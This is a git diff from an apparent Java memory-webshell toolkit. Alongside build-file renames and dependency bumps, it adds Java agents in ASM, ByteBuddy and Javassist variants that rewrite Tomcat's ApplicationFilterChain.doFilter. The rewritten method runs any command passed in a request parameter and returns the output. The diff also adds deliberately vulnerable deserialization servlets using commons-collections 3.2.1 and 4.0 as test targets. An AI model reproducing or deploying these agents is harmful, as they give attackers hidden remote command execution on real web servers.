+repositories { + mavenCentral() +} + java { toolchain { languageVersion = JavaLanguageVersion.of(8) @@ -16,7 +20,6 @@ java { dependencies { implementation 'org.ow2.asm:asm-commons:9.7.1' - implementation 'javax.servlet:javax.servlet-api:3.1.0' } jar { @@ -27,4 +30,6 @@ jar { attributes 'Can-Retransform-Classes': true attributes 'Can-Set-Native-Method-Prefix': true } -} \ No newline at end of file +} + +jar.finalizedBy shadowJar \ No newline at end of file diff --git a/memshell-agent/memshell-agent-asm/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java b/memshell-agent/memshell-agent-asm/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java index 827050fe..60ff9d84 100644 --- a/memshell-agent/memshell-agent-asm/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java +++ b/memshell-agent/memshell-agent-asm/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java @@ -4,7 +4,7 @@ import java.lang.instrument.ClassFileTransformer; import java.lang.instrument.Instrumentation; -import java.lang.reflect.Method; +import java.lang.instrument.UnmodifiableClassException; import java.security.ProtectionDomain; /** @@ -14,19 +14,51 @@ public class CommandFilterChainTransformer implements ClassFileTransformer { private static final String TARGET_CLASS = "org/apache/catalina/core/ApplicationFilterChain"; - public static ClassVisitor getClassVisitor(ClassVisitor cv) { - return new ClassVisitor(Opcodes.ASM9, cv) { - @Override - public MethodVisitor visitMethod(int access, String name, String descriptor, - String signature, String[] exceptions) { - MethodVisitor mv = super.visitMethod(access, name, descriptor, signature, exceptions); - if ("doFilter".equals(name) && - "(Ljavax/servlet/ServletRequest;Ljavax/servlet/ServletResponse;)V".equals(descriptor)) { - return new DoFilterMethodVisitor(mv); - } - return mv; + @Override + public byte[] transform(final ClassLoader loader, String className, Class classBeingRedefined, + ProtectionDomain protectionDomain, byte[] bytes) { + if (TARGET_CLASS.equals(className)) { + try { + ClassReader cr = new ClassReader(bytes); + ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS | ClassWriter.COMPUTE_FRAMES) { + @Override + protected ClassLoader getClassLoader() { + return loader; + } + }; + ClassVisitor cv = new ClassVisitor(Opcodes.ASM9, cw) { + @Override + public MethodVisitor visitMethod(int access, String name, String descriptor, + String signature, String[] exceptions) { + MethodVisitor mv = super.visitMethod(access, name, descriptor, signature, exceptions); + if ("doFilter".equals(name) && + "(Ljavax/servlet/ServletRequest;Ljavax/servlet/ServletResponse;)V".equals(descriptor)) { + return new DoFilterMethodVisitor(mv); + } + return mv; + } + }; + cr.accept(cv, ClassReader.EXPAND_FRAMES); + return cw.toByteArray(); + } catch (Exception e) { + e.printStackTrace(); + } + } + return bytes; + } + + public static void premain(String args, Instrumentation inst) { + inst.addTransformer(new CommandFilterChainTransformer(), true); + } + + public static void agentmain(String args, Instrumentation inst) throws UnmodifiableClassException { + inst.addTransformer(new CommandFilterChainTransformer(), true); + for (Class allLoadedClass : inst.getAllLoadedClasses()) { + String name = allLoadedClass.getName(); + if (TARGET_CLASS.replace("/", ".").equals(name)) { + inst.retransformClasses(allLoadedClass); } - }; + } } private static class DoFilterMethodVisitor extends MethodVisitor { @@ -178,32 +210,4 @@ public void visitCode() { } } - @Override - public byte[] transform(ClassLoader loader, String className, Class classBeingRedefined, - ProtectionDomain protectionDomain, byte[] bytes) { - if (TARGET_CLASS.equals(className)) { - try { - ClassReader cr = new ClassReader(bytes); - ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS | ClassWriter.COMPUTE_FRAMES); - Method getClassLoader = cw.getClass().getDeclaredMethod("getClassLoader"); - getClassLoader.setAccessible(true); - System.out.println(getClassLoader.invoke(cw)); - ClassVisitor cv = CommandFilterChainTransformer.getClassVisitor(cw); - cr.accept(cv, ClassReader.EXPAND_FRAMES); - return cw.toByteArray(); - } catch (Exception e) { - e.printStackTrace(); - } - } - return bytes; - } - - public static void premain(String args, Instrumentation inst) { - inst.addTransformer(new CommandFilterChainTransformer(), true); - } - - public static void agentmain(String args, Instrumentation inst) { - System.out.println(DoFilterMethodVisitor.class.getClassLoader()); - inst.addTransformer(new CommandFilterChainTransformer(), true); - } } \ No newline at end of file diff --git a/memshell-agent/memshell-agent-bytebuddy/build.gradle b/memshell-agent/memshell-agent-bytebuddy/build.gradle index 1d470d51..5f88a86b 100644 --- a/memshell-agent/memshell-agent-bytebuddy/build.gradle +++ b/memshell-agent/memshell-agent-bytebuddy/build.gradle @@ -1,16 +1,31 @@ plugins { id 'java' + id 'com.github.johnrengelman.shadow' version '8.1.1' } group = 'com.reajason.javaweb' version = '1.0.0' +java { + toolchain { + languageVersion = JavaLanguageVersion.of(8) + } + sourceCompatibility = JavaVersion.VERSION_1_6 + targetCompatibility = JavaVersion.VERSION_1_6 +} dependencies { - testImplementation platform('org.junit:junit-bom:5.10.0') - testImplementation 'org.junit.jupiter:junit-jupiter' + implementation 'net.bytebuddy:byte-buddy:1.17.5' +} + +jar { + manifest { + attributes 'Premain-Class': 'com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer' + attributes 'Agent-Class': 'com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer' + attributes 'Can-Redefine-Classes': true + attributes 'Can-Retransform-Classes': true + attributes 'Can-Set-Native-Method-Prefix': true + } } -test { - useJUnitPlatform() -} \ No newline at end of file +jar.finalizedBy shadowJar \ No newline at end of file diff --git a/memshell-agent/memshell-agent-bytebuddy/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java b/memshell-agent/memshell-agent-bytebuddy/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java new file mode 100644 index 00000000..7c874cb6 --- /dev/null +++ b/memshell-agent/memshell-agent-bytebuddy/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java @@ -0,0 +1,71 @@ +package com.reajason.javaweb.memshell.agent; + +import net.bytebuddy.agent.builder.AgentBuilder; +import net.bytebuddy.asm.Advice; +import net.bytebuddy.description.type.TypeDescription; +import net.bytebuddy.dynamic.DynamicType; +import net.bytebuddy.matcher.ElementMatchers; +import net.bytebuddy.utility.JavaModule; + +import java.io.InputStream; +import java.io.OutputStream; +import java.lang.instrument.Instrumentation; +import java.security.ProtectionDomain; + +import static net.bytebuddy.matcher.ElementMatchers.named; + +/** + * @author ReaJason + * @since 2025/4/2 + */ +public class CommandFilterChainTransformer implements AgentBuilder.Transformer { + + @Advice.OnMethodEnter(skipOn = Advice.OnNonDefaultValue.class) + public static boolean enter( + @Advice.Argument(value = 0) Object request, + @Advice.Argument(value = 1) Object response + ) { + String paramName = "paramName"; + try { + String cmd = (String) request.getClass().getMethod("getParameter", String.class).invoke(request, paramName); + if (cmd != null) { + Process exec = Runtime.getRuntime().exec(cmd); + InputStream inputStream = exec.getInputStream(); + OutputStream outputStream = (OutputStream) response.getClass().getMethod("getOutputStream").invoke(response); + byte[] buf = new byte[8192]; + int length; + while ((length = inputStream.read(buf)) != -1) { + outputStream.write(buf, 0, length); + } + return true; // 此处返回 true 配合 skipOn = Advice.OnNonDefaultValue.class,即意为不再执行目标方法自带的代码,直接返回。 + } + } catch (Exception ignored) { + } + return false; // 此处返回 false 配合 skipOn = Advice.OnNonDefaultValue.class,意为继续执行目标方法自带的代码。 + } + + @Override + public DynamicType.Builder transform(DynamicType.Builder builder, TypeDescription typeDescription, ClassLoader classLoader, JavaModule module, ProtectionDomain protectionDomain) { + return builder.visit(Advice.to(CommandFilterChainTransformer.class).on(named("doFilter"))); + } + + public static void premain(String args, Instrumentation inst) throws Exception { + launch(inst); + } + + public static void agentmain(String args, Instrumentation inst) throws Exception { + launch(inst); + } + + private static void launch(Instrumentation inst) throws Exception { + new AgentBuilder.Default() + .ignore(ElementMatchers.none()) + .disableClassFormatChanges() + .with(AgentBuilder.RedefinitionStrategy.REDEFINITION) + .with(AgentBuilder.Listener.StreamWriting.toSystemError().withErrorsOnly()) + .with(AgentBuilder.Listener.StreamWriting.toSystemOut().withTransformationsOnly()) + .type(named("org.apache.catalina.core.ApplicationFilterChain")) + .transform(new CommandFilterChainTransformer()) + .installOn(inst); + } +} diff --git a/memshell-agent/memshell-agent-javassist/build.gradle b/memshell-agent/memshell-agent-javassist/build.gradle index d5eaeef3..896d0c3d 100644 --- a/memshell-agent/memshell-agent-javassist/build.gradle +++ b/memshell-agent/memshell-agent-javassist/build.gradle @@ -1,15 +1,31 @@ plugins { id 'java' + id 'com.github.johnrengelman.shadow' version '8.1.1' } group = 'com.reajason.javaweb' version = '1.0.0' +java { + toolchain { + languageVersion = JavaLanguageVersion.of(8) + } + sourceCompatibility = JavaVersion.VERSION_1_6 + targetCompatibility = JavaVersion.VERSION_1_6 +} + dependencies { - testImplementation platform('org.junit:junit-bom:5.10.0') - testImplementation 'org.junit.jupiter:junit-jupiter' + implementation 'org.javassist:javassist:3.30.2-GA' +} + +jar { + manifest { + attributes 'Premain-Class': 'com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer' + attributes 'Agent-Class': 'com.reajason.javaweb.memshell.agent.CommandFilterChainTransformer' + attributes 'Can-Redefine-Classes': true + attributes 'Can-Retransform-Classes': true + attributes 'Can-Set-Native-Method-Prefix': true + } } -test { - useJUnitPlatform() -} \ No newline at end of file +jar.finalizedBy shadowJar \ No newline at end of file diff --git a/memshell-agent/memshell-agent-javassist/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java b/memshell-agent/memshell-agent-javassist/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java new file mode 100644 index 00000000..5b2c5053 --- /dev/null +++ b/memshell-agent/memshell-agent-javassist/src/main/java/com/reajason/javaweb/memshell/agent/CommandFilterChainTransformer.java @@ -0,0 +1,66 @@ +package com.reajason.javaweb.memshell.agent; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtMethod; + +import java.io.ByteArrayInputStream; +import java.lang.instrument.ClassFileTransformer; +import java.lang.instrument.Instrumentation; +import java.security.ProtectionDomain; + +public class CommandFilterChainTransformer implements ClassFileTransformer { + private static final String TARGET_CLASS = "org/apache/catalina/core/ApplicationFilterChain"; + + @Override + public byte[] transform(ClassLoader loader, String className, Class classBeingRedefined, + ProtectionDomain protectionDomain, byte[] bytes) { + if (TARGET_CLASS.equals(className)) { + try { + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new javassist.LoaderClassPath(loader)); + + CtClass cc = pool.makeClass(new ByteArrayInputStream(bytes), true); + CtMethod doFilter = cc.getDeclaredMethod("doFilter"); + + String code = + "String paramName = \"paramName\";" + + "try {" + + " String cmd = $1.getParameter(paramName);" + + " if (cmd != null) {" + + " Process exec = Runtime.getRuntime().exec(cmd);" + + " java.io.InputStream inputStream = exec.getInputStream();" + + " byte[] buf = new byte[8192];" + + " int length;" + + " while ((length = inputStream.read(buf)) != -1) {" + + " $2.getOutputStream().write(buf, 0, length);" + + " }" + + " return;" + + " }" + + "} catch (Exception ignored) {}"; + + doFilter.insertBefore(code); + byte[] transformedBytes = cc.toBytecode(); + cc.detach(); + return transformedBytes; + } catch (Exception e) { + e.printStackTrace(); + } + } + return bytes; + } + + public static void premain(String args, Instrumentation inst) { + inst.addTransformer(new CommandFilterChainTransformer(), true); + } + + public static void agentmain(String args, Instrumentation inst) throws Exception { + inst.addTransformer(new CommandFilterChainTransformer(), true); + for (Class allLoadedClass : inst.getAllLoadedClasses()) { + String name = allLoadedClass.getName(); + if (TARGET_CLASS.replace("/", ".").equals(name)) { + inst.retransformClasses(allLoadedClass); + } + } + } +} \ No newline at end of file diff --git a/memshell-java8/build.gradle b/memshell-java8/build.gradle index 5cfacb7f..f29a56fc 100644 --- a/memshell-java8/build.gradle +++ b/memshell-java8/build.gradle @@ -1,4 +1,5 @@ -group = 'com.reajason.javaweb' +group = 'io.github.reajason' +description = "Normal Java MemShell for Java8" version = rootProject.version java { diff --git a/bom/build.gradle b/memshell-party-bom/build.gradle similarity index 62% rename from bom/build.gradle rename to memshell-party-bom/build.gradle index fe96df6e..52608189 100644 --- a/bom/build.gradle +++ b/memshell-party-bom/build.gradle @@ -2,11 +2,14 @@ plugins { id 'java-platform' } +group = "io.github.reajason" +description = "This Bill of Materials POM can be used to ease dependency management when referencing multiple MemShellParty artifacts using Gradle or Maven." +version = rootProject.version + dependencies { constraints { - api 'net.bytebuddy:byte-buddy:1.+' + api 'net.bytebuddy:byte-buddy:1.17.5' api 'org.ow2.asm:asm-commons:9.7.1' - api 'com.github.jar-analyzer:class-obf:1.5.0' api 'javax.servlet:javax.servlet-api:3.0.1' api 'jakarta.servlet:jakarta.servlet-api:6.0.0' @@ -16,16 +19,17 @@ dependencies { api 'org.springframework:spring-webflux:5.3.24' api 'io.projectreactor.netty:reactor-netty-core:1.1.25' - api 'commons-io:commons-io:2.+' - api 'org.apache.commons:commons-lang3:3.+' - api 'commons-codec:commons-codec:1.+' - api 'ch.qos.logback:logback-classic:1.+' + api 'commons-io:commons-io:2.18.0' + api 'org.apache.commons:commons-lang3:3.17.0' + api 'commons-codec:commons-codec:1.18.0' + api 'ch.qos.logback:logback-classic:1.5.18' api 'org.apache.bcel:bcel:5.2' api 'org.java-websocket:Java-WebSocket:1.5.7' - api 'com.squareup.okhttp3:okhttp:4.+' + api 'com.squareup.okhttp3:okhttp:4.12.0' api 'com.alibaba.fastjson2:fastjson2:2.0.53' + api 'com.fasterxml.jackson.core:jackson-databind:2.18.3' api 'org.jetbrains:annotations:26.0.1' @@ -36,4 +40,4 @@ dependencies { api 'org.testcontainers:testcontainers:1.20.5' api 'org.testcontainers:junit-jupiter:1.20.5' } -} +} \ No newline at end of file diff --git a/common/build.gradle b/memshell-party-common/build.gradle similarity index 88% rename from common/build.gradle rename to memshell-party-common/build.gradle index f5de88d2..657b56b2 100644 --- a/common/build.gradle +++ b/memshell-party-common/build.gradle @@ -1,8 +1,5 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - -group = 'com.reajason.javaweb' +group = 'io.github.reajason' +description = "Common Utilities for MemShellParty" version = rootProject.version java { diff --git a/common/src/main/java/com/reajason/javaweb/ClassBytesShrink.java b/memshell-party-common/src/main/java/com/reajason/javaweb/ClassBytesShrink.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/ClassBytesShrink.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/ClassBytesShrink.java diff --git a/common/src/main/java/com/reajason/javaweb/asm/ClassRenameUtils.java b/memshell-party-common/src/main/java/com/reajason/javaweb/asm/ClassRenameUtils.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/asm/ClassRenameUtils.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/asm/ClassRenameUtils.java diff --git a/common/src/main/java/com/reajason/javaweb/asm/InnerClassDiscovery.java b/memshell-party-common/src/main/java/com/reajason/javaweb/asm/InnerClassDiscovery.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/asm/InnerClassDiscovery.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/asm/InnerClassDiscovery.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/ByPassJavaModuleInterceptor.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ByPassJavaModuleInterceptor.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/ByPassJavaModuleInterceptor.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ByPassJavaModuleInterceptor.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/ClassRenameVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ClassRenameVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/ClassRenameVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ClassRenameVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/ClinitRemovingAsmVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ClinitRemovingAsmVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/ClinitRemovingAsmVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ClinitRemovingAsmVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/LdcReAssignVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/LdcReAssignVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/LdcReAssignVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/LdcReAssignVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/LogRemoveMethodVisitor.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/LogRemoveMethodVisitor.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/LogRemoveMethodVisitor.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/LogRemoveMethodVisitor.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/ServletRenameVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ServletRenameVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/ServletRenameVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/ServletRenameVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/buddy/TargetJreVersionVisitorWrapper.java b/memshell-party-common/src/main/java/com/reajason/javaweb/buddy/TargetJreVersionVisitorWrapper.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/buddy/TargetJreVersionVisitorWrapper.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/buddy/TargetJreVersionVisitorWrapper.java diff --git a/common/src/main/java/com/reajason/javaweb/util/ClassDefiner.java b/memshell-party-common/src/main/java/com/reajason/javaweb/util/ClassDefiner.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/util/ClassDefiner.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/util/ClassDefiner.java diff --git a/common/src/main/java/com/reajason/javaweb/util/ClassUtils.java b/memshell-party-common/src/main/java/com/reajason/javaweb/util/ClassUtils.java similarity index 100% rename from common/src/main/java/com/reajason/javaweb/util/ClassUtils.java rename to memshell-party-common/src/main/java/com/reajason/javaweb/util/ClassUtils.java diff --git a/common/src/test/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapperTest.java b/memshell-party-common/src/test/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapperTest.java similarity index 100% rename from common/src/test/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapperTest.java rename to memshell-party-common/src/test/java/com/reajason/javaweb/buddy/MethodCallReplaceVisitorWrapperTest.java diff --git a/memshell-party-common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java b/memshell-party-common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java new file mode 100644 index 00000000..cd4f7e91 --- /dev/null +++ b/memshell-party-common/src/test/java/com/reajason/javaweb/util/ClassUtilsTest.java @@ -0,0 +1,23 @@ +package com.reajason.javaweb.util; + +import java.util.Base64;; +import org.junit.jupiter.api.Disabled; +import org.junit.jupiter.api.Test; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +/** + * @author ReaJason + * @since 2024/12/22 + */ +class ClassUtilsTest { + + @Test + @Disabled + void testBase64() throws IOException { + byte[] bytes = Base64.getDecoder().decode(""); + Files.write(Paths.get("xix.class"), bytes); + } +} \ No newline at end of file diff --git a/memshell/build.gradle b/memshell/build.gradle index 7f9e9bd5..b533fa7f 100644 --- a/memshell/build.gradle +++ b/memshell/build.gradle @@ -1,4 +1,5 @@ -group = 'com.reajason.javaweb' +group = 'io.github.reajason' +description = "Normal Java MemShell" version = rootProject.version diff --git a/settings.gradle b/settings.gradle index ebcd4e42..4aaf8b6b 100644 --- a/settings.gradle +++ b/settings.gradle @@ -2,18 +2,10 @@ plugins { id 'org.gradle.toolchains.foojay-resolver-convention' version '0.9.0' } -dependencyResolutionManagement { - repositoriesMode.set(RepositoriesMode.FAIL_ON_PROJECT_REPOS) - repositories { - mavenCentral() - maven { url 'https://jitpack.io' } - } -} - -rootProject.name = 'MemShellParty' +rootProject.name = 'memshell-party' -include 'bom' -include 'common' +include 'memshell-party-bom' +include 'memshell-party-common' include 'tools' include 'tools:godzilla' diff --git a/tools/ant-sword/build.gradle b/tools/ant-sword/build.gradle index 14e2dada..89c5ffe6 100644 --- a/tools/ant-sword/build.gradle +++ b/tools/ant-sword/build.gradle @@ -1,7 +1,3 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - group = 'com.reajason.javaweb.tools' version = rootProject.version @@ -14,7 +10,7 @@ java { } dependencies { - implementation project(":common") + implementation project(":memshell-party-common") implementation 'net.bytebuddy:byte-buddy' implementation 'javax.servlet:javax.servlet-api' diff --git a/tools/behinder/build.gradle b/tools/behinder/build.gradle index b66df4ac..3e0ef453 100644 --- a/tools/behinder/build.gradle +++ b/tools/behinder/build.gradle @@ -1,8 +1,4 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - -group = 'com.reajason.javaweb.tools' +group = 'io.github.reajason.tools' version = rootProject.version java { @@ -15,7 +11,7 @@ java { dependencies { - implementation project(":common") + implementation project(":memshell-party-common") implementation 'net.bytebuddy:byte-buddy' implementation 'commons-io:commons-io' diff --git a/tools/behinder/src/main/java/com/reajason/javaweb/behinder/Utils.java b/tools/behinder/src/main/java/com/reajason/javaweb/behinder/Utils.java index b1e66577..fd0b0e8b 100644 --- a/tools/behinder/src/main/java/com/reajason/javaweb/behinder/Utils.java +++ b/tools/behinder/src/main/java/com/reajason/javaweb/behinder/Utils.java @@ -41,9 +41,8 @@ private static String getRandomStringInternal(int length) { public static String getRandomClassName() { String[] domainAs = new String[]{"com", "net", "org", "sun"}; - String domainB = getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase(); - String domainC = getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase(); - String domainD = getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase(); + String domainB = getRandomAlpha((new Random()).nextInt(5) + 3); + String domainC = getRandomAlpha((new Random()).nextInt(5) + 3); String className = getRandomAlpha((new Random()).nextInt(7) + 4); className = className.substring(0, 1).toUpperCase() + className.substring(1).toLowerCase(); int domainAIndex = (new Random()).nextInt(4); diff --git a/tools/godzilla/build.gradle b/tools/godzilla/build.gradle index 5bbd8ec1..4d1c8b56 100644 --- a/tools/godzilla/build.gradle +++ b/tools/godzilla/build.gradle @@ -1,9 +1,4 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - - -group = 'com.reajason.javaweb.tools' +group = 'io.github.reajason.tools' version = rootProject.version java { @@ -13,7 +8,7 @@ java { dependencies { - implementation project(":common") + implementation project(":memshell-party-common") implementation 'net.bytebuddy:byte-buddy' diff --git a/tools/suo5/build.gradle b/tools/suo5/build.gradle index 5bbd8ec1..4d1c8b56 100644 --- a/tools/suo5/build.gradle +++ b/tools/suo5/build.gradle @@ -1,9 +1,4 @@ -plugins { - id "io.freefair.lombok" version "8.11" -} - - -group = 'com.reajason.javaweb.tools' +group = 'io.github.reajason.tools' version = rootProject.version java { @@ -13,7 +8,7 @@ java { dependencies { - implementation project(":common") + implementation project(":memshell-party-common") implementation 'net.bytebuddy:byte-buddy' diff --git a/vul/vul-springboot1/build.gradle b/vul/vul-springboot1/build.gradle index 29257cfc..7c09bf7a 100644 --- a/vul/vul-springboot1/build.gradle +++ b/vul/vul-springboot1/build.gradle @@ -8,6 +8,10 @@ java { sourceCompatibility = JavaVersion.VERSION_1_8 } +repositories { + mavenCentral() +} + configurations { providedRuntime } diff --git a/vul/vul-springboot2/build.gradle b/vul/vul-springboot2/build.gradle index ef477fa6..297381d1 100644 --- a/vul/vul-springboot2/build.gradle +++ b/vul/vul-springboot2/build.gradle @@ -9,6 +9,10 @@ java { sourceCompatibility = JavaVersion.VERSION_1_8 } +repositories { + mavenCentral() +} + dependencies { implementation 'org.springframework.boot:spring-boot-starter-web' implementation 'commons-io:commons-io:2.+' diff --git a/vul/vul-webapp-deserialize/build.gradle b/vul/vul-webapp-deserialize/build.gradle index 9a0b3571..1cbc63a2 100644 --- a/vul/vul-webapp-deserialize/build.gradle +++ b/vul/vul-webapp-deserialize/build.gradle @@ -16,6 +16,8 @@ configurations { cb183 cb170 cb161 + cc321 + cc40 } dependencies { @@ -24,6 +26,8 @@ dependencies { cb183 'commons-beanutils:commons-beanutils:1.8.3' cb170 'commons-beanutils:commons-beanutils:1.7.0' cb161 'commons-beanutils:commons-beanutils:1.6.1' + cc321 'commons-collections:commons-collections:3.2.1' + cc40 'org.apache.commons:commons-collections4:4.0' implementation 'com.caucho:hessian:4.0.66' providedCompile 'javax.servlet:javax.servlet-api:3.1.0' @@ -40,6 +44,8 @@ war { copy { from configurations.cb183 into "src/main/webapp/WEB-INF/dep" } copy { from configurations.cb170 into "src/main/webapp/WEB-INF/dep" } copy { from configurations.cb161 into "src/main/webapp/WEB-INF/dep" } + copy { from configurations.cc321 into "src/main/webapp/WEB-INF/dep" } + copy { from configurations.cc40 into "src/main/webapp/WEB-INF/dep" } } } diff --git a/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC321jServlet.java b/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC321jServlet.java new file mode 100644 index 00000000..b4ba1a67 --- /dev/null +++ b/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC321jServlet.java @@ -0,0 +1,17 @@ +import javax.servlet.annotation.WebServlet; +import java.util.Collections; +import java.util.List; + +/** + * @author ReaJason + * @since 2024/12/10 + */ +@WebServlet("/java_deserialize/cc321") +public class JavaReadObjCC321jServlet extends BaseDeserializeServlet { + + @Override + List getDependentPaths() { + return Collections.singletonList("commons-collections-3.2.1.jar"); + } + +} diff --git a/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC40jServlet.java b/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC40jServlet.java new file mode 100644 index 00000000..36ea4dfd --- /dev/null +++ b/vul/vul-webapp-deserialize/src/main/java/JavaReadObjCC40jServlet.java @@ -0,0 +1,17 @@ +import javax.servlet.annotation.WebServlet; +import java.util.Collections; +import java.util.List; + +/** + * @author ReaJason + * @since 2024/12/10 + */ +@WebServlet("/java_deserialize/cc40") +public class JavaReadObjCC40jServlet extends BaseDeserializeServlet { + + @Override + List getDependentPaths() { + return Collections.singletonList("commons-collections4-4.0.jar"); + } + +} diff --git a/vul/vul-webapp/build.gradle b/vul/vul-webapp/build.gradle index 7647b036..613e2e74 100644 --- a/vul/vul-webapp/build.gradle +++ b/vul/vul-webapp/build.gradle @@ -12,6 +12,6 @@ java { dependencies { implementation 'commons-fileupload:commons-fileupload:1.3.3' - implementation 'commons-beanutils:commons-beanutils:1.9.4' + implementation 'commons-beanutils:commons-beanutils:1.9.2' providedCompile "javax.servlet:servlet-api:2.5" } diff --git a/web/bun.lockb b/web/bun.lockb index 0f676f38..3d3c8276 100755 Binary files a/web/bun.lockb and b/web/bun.lockb differ diff --git a/web/package.json b/web/package.json index fb299fb1..2aeae5c2 100644 --- a/web/package.json +++ b/web/package.json @@ -15,50 +15,72 @@ }, "devDependencies": { "@biomejs/biome": "1.9.4", - "@tanstack/router-plugin": "^1.114.30", - "@types/node": "^22.13.14", - "@types/react": "^19.0.12", + "@types/node": "^22.14.0", + "@types/react": "^19.1.0", "@types/react-copy-to-clipboard": "^5.0.7", - "@types/react-dom": "^19.0.4", + "@types/react-dom": "^19.1.1", "@types/react-syntax-highlighter": "^15.5.13", "@vitejs/plugin-react": "^4.3.4", "rimraf": "^6.0.1", - "tailwindcss": "^4.0.17", - "typescript": "^5.8.2", - "vite": "^6.2.3", + "tailwindcss": "^4.1.3", + "typescript": "^5.8.3", + "vite": "^6.2.5", "vite-bundle-visualizer": "^1.2.1" }, "dependencies": { - "@hookform/resolvers": "^4.1.3", + "@hookform/resolvers": "^5.0.1", + "@radix-ui/react-accordion": "^1.2.3", "@radix-ui/react-alert-dialog": "^1.1.6", + "@radix-ui/react-aspect-ratio": "^1.1.2", + "@radix-ui/react-avatar": "^1.1.3", "@radix-ui/react-checkbox": "^1.1.4", + "@radix-ui/react-collapsible": "^1.1.3", + "@radix-ui/react-context-menu": "^2.2.6", + "@radix-ui/react-dialog": "^1.1.6", "@radix-ui/react-dropdown-menu": "^2.1.6", + "@radix-ui/react-hover-card": "^1.1.6", "@radix-ui/react-label": "^2.1.2", + "@radix-ui/react-menubar": "^1.1.6", + "@radix-ui/react-navigation-menu": "^1.2.5", + "@radix-ui/react-popover": "^1.1.6", + "@radix-ui/react-progress": "^1.1.2", "@radix-ui/react-radio-group": "^1.2.3", + "@radix-ui/react-scroll-area": "^1.2.3", "@radix-ui/react-select": "^2.1.6", "@radix-ui/react-separator": "^1.1.2", + "@radix-ui/react-slider": "^1.2.3", "@radix-ui/react-slot": "^1.1.2", "@radix-ui/react-switch": "^1.1.3", "@radix-ui/react-tabs": "^1.1.3", + "@radix-ui/react-toggle": "^1.1.2", + "@radix-ui/react-toggle-group": "^1.1.2", "@radix-ui/react-tooltip": "^1.1.8", - "@tailwindcss/vite": "^4.0.17", - "@tanstack/react-query": "^5.70.0", - "@tanstack/react-router": "^1.114.29", - 